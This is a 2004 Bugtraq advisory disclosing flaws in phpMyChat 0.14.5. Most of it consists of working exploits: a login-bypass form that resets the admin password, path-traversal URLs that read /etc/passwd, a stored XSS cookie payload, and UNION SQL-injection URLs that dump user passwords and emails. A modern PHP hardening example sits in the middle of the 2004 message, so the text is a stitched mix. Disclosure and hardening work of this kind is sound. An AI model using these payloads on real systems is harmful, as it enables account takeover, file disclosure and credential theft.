Date: Fri, 23 Apr 2004 02:10:22 +0400
From: HEX <hex@....net.ru>
To: bugtraq@...urityfocus.com
Subject: phpMyChat 0.14.5


Information :
°°°°°°°°°°°°
Language : PHP
Affected version : phpMyChat ver. 0.14.5 (and earlier ?)
Patched version : none
Website : http://www.phpheaven.net/
Problems : Persistent XSS, authorization bypass, SQL injection, arbitrary file include (file read).

Objects :
°°°°°°°
- lib/login.lib.php3
- admin/adminBody.php3
and more ...

Exploits :
°°°°°°°°
1) To log in without authorization, only one additional variable needs to be sent: do_not_login="false"

   Example:
   <HTML>

   <HEAD>
   <TITLE>phpMyChat exploit</TITLE>
   </HEAD>

   <BODY>
   <FORM ACTION="http://[TARGET]/chat/edituser.php3" METHOD="GET" AUTOCOMPLETE="OFF" NAME="EditUsrForm">
   <INPUT type="hidden" name="FORM_SEND" value="1">
   <INPUT type="hidden" name="AUTH_USERNAME" value="admin">
   <INPUT type="hidden" name="AUTH_PASSWORD" value="null">
   <!-- INSERT -->
   <INPUT type="hidden" name="do_not_login" value="false">
   <!-- END INSERT -->
   <INPUT TYPE="hidden" NAME="L" VALUE="russian">
   <INPUT TYPE="text" NAME="U" VALUE="admin">NAME *<BR>
   <INPUT TYPE="text" NAME="PASSWORD" VALUE="hex_pass">NEW PASS *<BR>
   <INPUT TYPE="text" NAME="FIRSTNAME" VALUE="">FIRST NAME<BR>
   <INPUT TYPE="text" NAME="LASTNAME" VALUE="">LAST NAME<BR>
   <INPUT TYPE="radio" NAME="GENDER" VALUE="1" >male<BR>
   <INPUT TYPE="radio" NAME="GENDER" VALUE="2" >female<BR>
   <INPUT TYPE="text" NAME="COUNTRY" VALUE="">COUNTRY<BR>
   <INPUT TYPE="text" NAME="WEBSITE" VALUE="">WEBSITE<BR>
   <INPUT TYPE="text" NAME="EMAIL" VALUE="you@...il.ru">
   <INPUT type="checkbox" name="SHOWEMAIL" value="1" >show e-mail in public information<BR>
   <INPUT TYPE="submit" NAME="submit_type" VALUE="Change">
   </FORM>
   </BODY>

   </HTML>
   
2) Reading files requires administrator rights (see item 1 above for how to obtain them)!
   
   The variables "sheet" and "What" are not filtered:
   require("./admin/admin${sheet}.php3");
   and
   if (isset($What) && $What != "") include("./admin/admin".$What.".php3");
   
   Example:
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=[USER]&pswd=[YOUR PASSWORD HASH]&sheet=[FILE]%00
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=Body&L=russian&user=admin&pswd=[YOUR PASSWORD HASH]&sheet=/../../../../../../etc/passwd%00
   and
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=[FILE]%00&L=russian&user=[USER]&pswd=[YOUR PASSWORD HASH]&sheet=1
   http://[TARGET]/chat/admin.php3?From=admin.php3&What=/../../../../../../etc/passwd%00&L=russian&user=admin&pswd=[YOUR PASSWORD HASH]&sheet=1

3) Cross-Site Scripting aka XSS
   The form in input.php3 has a variable "C" that carries the message colour; its value is stored and echoed back unfiltered.
   
   Example:
   <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\">[CODE]">
   <INPUT TYPE="TEXT" NAME="C" VALUE="#FF0000\"><script>alert(document.cookie)</script><a \"">
   
4) A large number of variables are not filtered:
   $sortBy, $sortOrder, $startReg, $U, $LastCheck and more ...
   Example SQL injection:
   http://[TARGET]/chat/usersL.php3?L=russian&R='[SQL]
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20/*
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20/*
   http://[TARGET]/chat/usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20/*
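The three unsafe patterns from items 2, 3 and 4 (the include path built from $sheet/$What, the unvalidated colour "C", and the raw "R" value spliced into SQL) can each be closed with strict server-side validation. The following is an added hardening example written for this advisory, not phpMyChat's own code: the table name c_reg_users comes from the URLs above, while the allowlist entries, the `LIKE` query shape and the use of mysqli are assumptions.

```php
<?php
// Added example: hardened handlers for the phpMyChat 0.14.5 issues above.
// Everything here is illustrative; only c_reg_users is taken from the advisory.
declare(strict_types=1);

// 1) Dynamic include: never build a filesystem path from request data.
//    Map the request value onto a fixed allowlist and reject anything else.
//    The user string is only ever used as an array key, so "../" traversal
//    and the "%00" null-byte truncation trick never reach require().
//    Only adminBody.php3 is named in the advisory; add real sheets as needed.
const ADMIN_SHEETS = ['Body' => 'adminBody.php3'];

function adminSheetPath(string $what): ?string
{
    return isset(ADMIN_SHEETS[$what]) ? __DIR__ . '/admin/' . ADMIN_SHEETS[$what] : null;
}

// 2) Message colour: accept only a literal "#rrggbb", so no quote, "<" or
//    script text is ever stored; escape at output time anyway.
function safeColour(string $c): string
{
    return preg_match('/^#[0-9A-Fa-f]{6}$/', $c) === 1 ? $c : '#000000';
}

function colourInput(string $c): string
{
    return '<INPUT TYPE="TEXT" NAME="C" VALUE="'
        . htmlspecialchars(safeColour($c), ENT_QUOTES) . '">';
}

// 3) User search: bind "R" as a parameter instead of concatenating it, so a
//    value such as "' UNION SELECT password,... /*" is matched as plain text
//    (the one-column LIKE query is an assumed stand-in for usersL.php3's query).
function findUsers(mysqli $db, string $r): array
{
    $stmt = $db->prepare('SELECT username FROM c_reg_users WHERE username LIKE ?');
    $pattern = '%' . $r . '%';
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}

// Request handling for the admin page: unknown sheet names are refused
// before any include happens.
$path = adminSheetPath((string)($_GET['What'] ?? ''));
if ($path === null) {
    http_response_code(400);
    exit('unknown admin sheet');
}
require $path;
```

The same principle applies to item 1: whether a visitor is logged in must be decided from server-side session state, never from a client-supplied flag such as do_not_login.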

Patch/More details :
°°°°°°°°°°°°°°°°°°
Waiting for the patch at http://www.phpheaven.net/


[ Attached files     | <none> ]
[ Moscow time 22:29, | Chukcha is not a reader, Chukcha is a CoSysOp... ]
[ Copyright by [HEX] | mailto:hex(a)hex.net.ru ]


